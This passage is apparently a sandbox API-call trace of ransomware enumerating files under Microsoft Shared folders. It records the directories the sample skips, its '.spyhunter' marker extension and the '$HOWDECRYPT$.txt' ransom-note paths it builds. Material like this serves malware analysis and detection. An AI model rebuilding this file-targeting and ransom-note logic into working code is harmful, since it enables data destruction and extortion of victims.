lstrcmpiW (lpString1="MSLID.DLL", lpString2="$Recycle.bin") returned 1 [0088.832] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.832] lstrcmpiW (lpString1="MSLID.DLL", lpString2="System Volume Information") returned -1 [0088.832] lstrlenW (lpString="System Volume Information") returned 25 [0088.832] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned 66 [0088.832] StrStrIW (lpFirst="MSLID.DLL", lpSrch=".spyhunter") returned 0x0 [0088.832] lstrcmpW (lpString1="MSLID.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.832] lstrcmpW (lpString1="MSLID.DLL", lpString2="_uninstalling_.png") returned 1 [0088.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned 66 [0088.832] GetProcessHeap () returned 0x2c0000 [0088.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x3583a0 [0088.832] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xce0) returned 0x3824f8 [0088.832] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.832] lstrcmpiW (lpString1="MSWDS_EN.LEX", lpString2="Windows") returned -1 [0088.833] lstrlenW (lpString="Windows") returned 7 [0088.833] lstrcmpiW (lpString1="MSWDS_EN.LEX", lpString2="$Recycle.bin") returned 1 [0088.833] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.833] lstrcmpiW (lpString1="MSWDS_EN.LEX", lpString2="System Volume Information") returned -1 [0088.833] lstrlenW (lpString="System Volume Information") returned 25 [0088.833] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned 69 [0088.833] StrStrIW (lpFirst="MSWDS_EN.LEX", lpSrch=".spyhunter") returned 0x0 [0088.833] lstrcmpW (lpString1="MSWDS_EN.LEX", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.833] lstrcmpW (lpString1="MSWDS_EN.LEX", lpString2="_uninstalling_.png") returned 1 [0088.833] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned 69 [0088.833] GetProcessHeap () returned 0x2c0000 [0088.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37d558 [0088.833] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xce8) returned 0x3824f8 [0088.833] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.833] lstrcmpiW (lpString1="MSWDS_ES.LEX", lpString2="Windows") returned -1 [0088.833] lstrlenW (lpString="Windows") returned 7 [0088.833] lstrcmpiW (lpString1="MSWDS_ES.LEX", lpString2="$Recycle.bin") returned 1 [0088.833] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.833] lstrcmpiW (lpString1="MSWDS_ES.LEX", lpString2="System Volume Information") returned -1 [0088.833] lstrlenW (lpString="System Volume Information") returned 25 [0088.833] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned 69 [0088.833] StrStrIW (lpFirst="MSWDS_ES.LEX", lpSrch=".spyhunter") returned 0x0 [0088.833] lstrcmpW (lpString1="MSWDS_ES.LEX", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.833] lstrcmpW (lpString1="MSWDS_ES.LEX", lpString2="_uninstalling_.png") returned 1 [0088.833] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned 69 [0088.833] GetProcessHeap () returned 0x2c0000 [0088.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37d630 [0088.833] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcf0) returned 0x3824f8 [0088.833] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.834] lstrcmpiW (lpString1="MSWDS_FR.LEX", lpString2="Windows") returned -1 [0088.834] lstrlenW (lpString="Windows") returned 7 [0088.834] lstrcmpiW (lpString1="MSWDS_FR.LEX", lpString2="$Recycle.bin") returned 1 [0088.834] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.834] lstrcmpiW (lpString1="MSWDS_FR.LEX", lpString2="System Volume Information") returned -1 [0088.834] lstrlenW (lpString="System Volume Information") returned 25 [0088.834] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX") returned 69 [0088.834] StrStrIW (lpFirst="MSWDS_FR.LEX", lpSrch=".spyhunter") returned 0x0 [0088.834] lstrcmpW (lpString1="MSWDS_FR.LEX", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.834] lstrcmpW (lpString1="MSWDS_FR.LEX", lpString2="_uninstalling_.png") returned 1 [0088.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX") returned 69 [0088.834] GetProcessHeap () returned 0x2c0000 [0088.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37d708 [0088.834] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcf8) returned 0x3824f8 [0088.834] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0088.834] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0088.834] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\$HOWDECRYPT$.txt") returned 73 [0088.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\$HOWDECRYPT$.txt") returned 73 [0088.834] GetProcessHeap () returned 0x2c0000 [0088.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x385280 [0088.834] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd00) returned 0x3824f8 [0088.835] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0088.835] lstrcmpiW (lpString1="Smart Tag", lpString2="Windows") returned -1 [0088.835] lstrlenW (lpString="Windows") returned 7 [0088.835] lstrcmpiW (lpString1="Smart Tag", lpString2="$Recycle.bin") returned 1 [0088.835] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.835] lstrcmpiW (lpString1="Smart Tag", lpString2="System Volume Information") returned -1 [0088.835] lstrlenW (lpString="System Volume Information") returned 25 [0088.836] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag") returned 60 [0088.836] lstrcmpW (lpString1="Smart Tag", lpString2=".") returned 1 [0088.836] lstrcmpW (lpString1="Smart Tag", lpString2="..") returned 1 [0088.836] GetProcessHeap () returned 0x2c0000 [0088.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0088.836] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*") returned 62 [0088.836] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0089.343] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.343] lstrlenW (lpString="Windows") returned 7 [0089.343] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.343] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.344] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.344] lstrlenW (lpString="System Volume Information") returned 25 [0089.344] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\.") returned 62 [0089.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.344] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.344] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.344] lstrlenW (lpString="Windows") returned 7 [0089.344] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.344] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.344] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.344] lstrlenW (lpString="System Volume Information") returned 25 [0089.344] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\..") returned 63 [0089.344] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.344] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.344] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.344] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0089.344] lstrlenW (lpString="Windows") returned 7 [0089.344] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0089.344] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.344] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0089.344] lstrlenW (lpString="System Volume Information") returned 25 [0089.344] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033") returned 65 [0089.344] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0089.344] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0089.344] GetProcessHeap () returned 0x2c0000 [0089.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.345] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*") returned 67 [0089.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0089.349] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.349] lstrlenW (lpString="Windows") returned 7 [0089.349] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.349] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.349] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.349] lstrlenW (lpString="System Volume Information") returned 25 [0089.349] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\.") returned 67 [0089.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.349] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.349] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.349] lstrlenW (lpString="Windows") returned 7 [0089.349] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.349] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.350] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.350] lstrlenW (lpString="System Volume Information") returned 25 [0089.350] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\..") returned 68 [0089.350] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.350] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.350] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.350] lstrcmpiW (lpString1="MCABOUT.HTM", lpString2="Windows") returned -1 [0089.350] lstrlenW (lpString="Windows") returned 7 [0089.350] lstrcmpiW (lpString1="MCABOUT.HTM", lpString2="$Recycle.bin") returned 1 [0089.350] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.350] lstrcmpiW (lpString1="MCABOUT.HTM", lpString2="System Volume Information") returned -1 [0089.350] lstrlenW (lpString="System Volume Information") returned 25 [0089.350] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 77 [0089.350] StrStrIW (lpFirst="MCABOUT.HTM", lpSrch=".spyhunter") returned 0x0 [0089.350] lstrcmpW (lpString1="MCABOUT.HTM", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.350] lstrcmpW (lpString1="MCABOUT.HTM", lpString2="_uninstalling_.png") returned 1 [0089.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 77 [0089.350] GetProcessHeap () returned 0x2c0000 [0089.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372de0 [0089.350] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xce8) returned 0x3824f8 [0089.350] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.350] lstrcmpiW (lpString1="STINTL.DLL", lpString2="Windows") returned -1 [0089.350] lstrlenW (lpString="Windows") returned 7 [0089.350] lstrcmpiW (lpString1="STINTL.DLL", lpString2="$Recycle.bin") returned 1 [0089.350] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.351] lstrcmpiW (lpString1="STINTL.DLL", lpString2="System Volume Information") returned -1 [0089.351] lstrlenW (lpString="System Volume Information") returned 25 [0089.351] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned 76 [0089.351] StrStrIW (lpFirst="STINTL.DLL", lpSrch=".spyhunter") returned 0x0 [0089.351] lstrcmpW (lpString1="STINTL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.351] lstrcmpW (lpString1="STINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0089.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned 76 [0089.351] GetProcessHeap () returned 0x2c0000 [0089.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372cf8 [0089.351] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcf0) returned 0x3824f8 [0089.351] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.351] lstrcmpiW (lpString1="STINTL.DLL.IDX_DLL", lpString2="Windows") returned -1 [0089.351] lstrlenW (lpString="Windows") returned 7 [0089.351] lstrcmpiW (lpString1="STINTL.DLL.IDX_DLL", lpString2="$Recycle.bin") returned 1 [0089.351] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.351] lstrcmpiW (lpString1="STINTL.DLL.IDX_DLL", lpString2="System Volume Information") returned -1 [0089.351] lstrlenW (lpString="System Volume Information") returned 25 [0089.351] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned 84 [0089.351] StrStrIW (lpFirst="STINTL.DLL.IDX_DLL", lpSrch=".spyhunter") returned 0x0 [0089.351] lstrcmpW (lpString1="STINTL.DLL.IDX_DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.351] lstrcmpW (lpString1="STINTL.DLL.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0089.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned 84 [0089.351] GetProcessHeap () returned 0x2c0000 [0089.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354718 [0089.351] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcf8) returned 0x3824f8 [0089.352] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0089.352] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0089.352] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\$HOWDECRYPT$.txt") returned 82 [0089.352] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\$HOWDECRYPT$.txt") returned 82 [0089.352] GetProcessHeap () returned 0x2c0000 [0089.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x329188 [0089.352] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd00) returned 0x3824f8 [0089.352] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.352] lstrcmpiW (lpString1="FBIBLIO.DLL", lpString2="Windows") returned -1 [0089.352] lstrlenW (lpString="Windows") returned 7 [0089.352] lstrcmpiW (lpString1="FBIBLIO.DLL", lpString2="$Recycle.bin") returned 1 [0089.352] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.352] lstrcmpiW (lpString1="FBIBLIO.DLL", lpString2="System Volume Information") returned -1 [0089.352] lstrlenW (lpString="System Volume Information") returned 25 [0089.352] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned 72 [0089.352] StrStrIW (lpFirst="FBIBLIO.DLL", lpSrch=".spyhunter") returned 0x0 [0089.352] lstrcmpW (lpString1="FBIBLIO.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.352] lstrcmpW (lpString1="FBIBLIO.DLL", lpString2="_uninstalling_.png") returned 1 [0089.352] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned 72 [0089.352] GetProcessHeap () returned 0x2c0000 [0089.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385280 [0089.352] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd08) returned 0x3824f8 [0089.352] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.353] lstrcmpiW (lpString1="FDATE.DLL", lpString2="Windows") returned -1 [0089.353] lstrlenW (lpString="Windows") returned 7 [0089.353] lstrcmpiW (lpString1="FDATE.DLL", lpString2="$Recycle.bin") returned 1 [0089.353] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.353] lstrcmpiW (lpString1="FDATE.DLL", lpString2="System Volume Information") returned -1 [0089.353] lstrlenW (lpString="System Volume Information") returned 25 [0089.353] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned 70 [0089.353] StrStrIW (lpFirst="FDATE.DLL", lpSrch=".spyhunter") returned 0x0 [0089.353] lstrcmpW (lpString1="FDATE.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.353] lstrcmpW (lpString1="FDATE.DLL", lpString2="_uninstalling_.png") returned 1 [0089.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned 70 [0089.353] GetProcessHeap () returned 0x2c0000 [0089.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37d480 [0089.353] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd10) returned 0x3824f8 [0089.353] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.353] lstrcmpiW (lpString1="FPERSON.DLL", lpString2="Windows") returned -1 [0089.353] lstrlenW (lpString="Windows") returned 7 [0089.353] lstrcmpiW (lpString1="FPERSON.DLL", lpString2="$Recycle.bin") returned 1 [0089.353] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.353] lstrcmpiW (lpString1="FPERSON.DLL", lpString2="System Volume Information") returned -1 [0089.353] lstrlenW (lpString="System Volume Information") returned 25 [0089.353] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned 72 [0089.353] StrStrIW (lpFirst="FPERSON.DLL", lpSrch=".spyhunter") returned 0x0 [0089.353] lstrcmpW (lpString1="FPERSON.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.353] lstrcmpW (lpString1="FPERSON.DLL", lpString2="_uninstalling_.png") returned 1 [0089.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned 72 [0089.353] GetProcessHeap () returned 0x2c0000 [0089.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385520 [0089.354] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd18) returned 0x3824f8 [0089.354] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.354] lstrcmpiW (lpString1="FPLACE.DLL", lpString2="Windows") returned -1 [0089.354] lstrlenW (lpString="Windows") returned 7 [0089.354] lstrcmpiW (lpString1="FPLACE.DLL", lpString2="$Recycle.bin") returned 1 [0089.354] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.354] lstrcmpiW (lpString1="FPLACE.DLL", lpString2="System Volume Information") returned -1 [0089.354] lstrlenW (lpString="System Volume Information") returned 25 [0089.354] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned 71 [0089.354] StrStrIW (lpFirst="FPLACE.DLL", lpSrch=".spyhunter") returned 0x0 [0089.354] lstrcmpW (lpString1="FPLACE.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.354] lstrcmpW (lpString1="FPLACE.DLL", lpString2="_uninstalling_.png") returned 1 [0089.354] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned 71 [0089.354] GetProcessHeap () returned 0x2c0000 [0089.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37d7e0 [0089.355] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd20) returned 0x3824f8 [0089.355] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.355] lstrcmpiW (lpString1="FSTOCK.DLL", lpString2="Windows") returned -1 [0089.355] lstrlenW (lpString="Windows") returned 7 [0089.355] lstrcmpiW (lpString1="FSTOCK.DLL", lpString2="$Recycle.bin") returned 1 [0089.355] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.355] lstrcmpiW (lpString1="FSTOCK.DLL", lpString2="System Volume Information") returned -1 [0089.355] lstrlenW (lpString="System Volume Information") returned 25 [0089.355] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL") returned 71 [0089.355] StrStrIW (lpFirst="FSTOCK.DLL", lpSrch=".spyhunter") returned 0x0 [0089.355] lstrcmpW (lpString1="FSTOCK.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.355] lstrcmpW (lpString1="FSTOCK.DLL", lpString2="_uninstalling_.png") returned 1 [0089.355] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL") returned 71 [0089.355] GetProcessHeap () returned 0x2c0000 [0089.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37d8b8 [0089.355] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd28) returned 0x3824f8 [0089.355] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.355] lstrcmpiW (lpString1="IETAG.DLL", lpString2="Windows") returned -1 [0089.355] lstrlenW (lpString="Windows") returned 7 [0089.355] lstrcmpiW (lpString1="IETAG.DLL", lpString2="$Recycle.bin") returned 1 [0089.355] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.355] lstrcmpiW (lpString1="IETAG.DLL", lpString2="System Volume Information") returned -1 [0089.355] lstrlenW (lpString="System Volume Information") returned 25 [0089.355] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL") returned 70 [0089.355] StrStrIW (lpFirst="IETAG.DLL", lpSrch=".spyhunter") returned 0x0 [0089.355] lstrcmpW (lpString1="IETAG.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.355] lstrcmpW (lpString1="IETAG.DLL", lpString2="_uninstalling_.png") returned 1 [0089.356] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL") returned 70 [0089.356] GetProcessHeap () returned 0x2c0000 [0089.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37d990 [0089.356] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd30) returned 0x3824f8 [0089.356] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.356] lstrcmpiW (lpString1="IMCONTACT.DLL", lpString2="Windows") returned -1 [0089.356] lstrlenW (lpString="Windows") returned 7 [0089.356] lstrcmpiW (lpString1="IMCONTACT.DLL", lpString2="$Recycle.bin") returned 1 [0089.356] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.356] lstrcmpiW (lpString1="IMCONTACT.DLL", lpString2="System Volume Information") returned -1 [0089.356] lstrlenW (lpString="System Volume Information") returned 25 [0089.356] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL") returned 74 [0089.356] StrStrIW (lpFirst="IMCONTACT.DLL", lpSrch=".spyhunter") returned 0x0 [0089.356] lstrcmpW (lpString1="IMCONTACT.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.356] lstrcmpW (lpString1="IMCONTACT.DLL", lpString2="_uninstalling_.png") returned 1 [0089.356] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL") returned 74 [0089.356] GetProcessHeap () returned 0x2c0000 [0089.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x385600 [0089.356] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd38) returned 0x3824f8 [0089.356] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.356] lstrcmpiW (lpString1="LISTS", lpString2="Windows") returned -1 [0089.356] lstrlenW 